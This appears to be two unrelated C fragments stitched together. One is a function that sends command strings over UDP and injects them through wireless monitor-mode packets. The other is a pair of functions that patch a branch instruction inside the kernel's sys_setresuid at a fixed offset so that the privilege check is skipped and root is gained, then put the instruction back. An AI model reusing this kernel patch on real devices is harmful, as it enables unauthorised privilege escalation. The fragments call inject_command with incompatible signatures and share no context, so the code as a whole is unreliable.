void query(char * q, char target_mode){ int sock; struct hostent *hp; struct sockaddr_in server; seq_stage++; if (stage[0]!='K'){ sock= socket(AF_INET, SOCK_DGRAM, 0); server.sin_family = AF_INET; if((target_mode=='F')||(target_mode=='B')||(seq_stage==10)){ server.sin_port = htons(PORT); hp = gethostbyname(IP); }else{ server.sin_port = htons(PORT_MON); hp = gethostbyname(IP_MON); } if (hp==0) printf("Unknown host"); bcopy((char *)hp->h_addr, (char *)&server.sin_addr,hp->h_length); if((target_mode=='F')||(seq_stage==10)){ seq_stage=0; #ifndef MANDO_ABORDO fprintf(stdout,"\n %li \t -> %s",seq_num,q); #endif sendto(sock,q,strlen(q),0,(const struct sockaddr *)&server,sizeof(struct sockaddr_in)); } close(sock); } if(target_mode!='F'){ #ifndef MANDO_ABORDO fprintf(stdout,"\n %li RFMON->",seq_num); #endif //print_vector(q,COMMAND_LEN); //sendto(sock,q,COMMAND_LEN,0,(const struct sockaddr *)&server,sizeof(struct sockaddr_in)); if(rfmon_avail){ inject_command(capture,&gcry_hd,mac,q, COMMAND_LEN, &seq_num); } } #ifndef MANDO_ABORDO fflush(stdout); #endif }
static bool restore_sys_setresuid(unsigned long int sys_setresuid_address) { const char bne[] = { 0x00, 0x1a }; return inject_command(bne, sys_setresuid_address + 0x42); }
static bool break_sys_setresuid(unsigned long int sys_setresuid_address) { const char beq[] = { 0x00, 0x0a }; return inject_command(beq, sys_setresuid_address + 0x42); }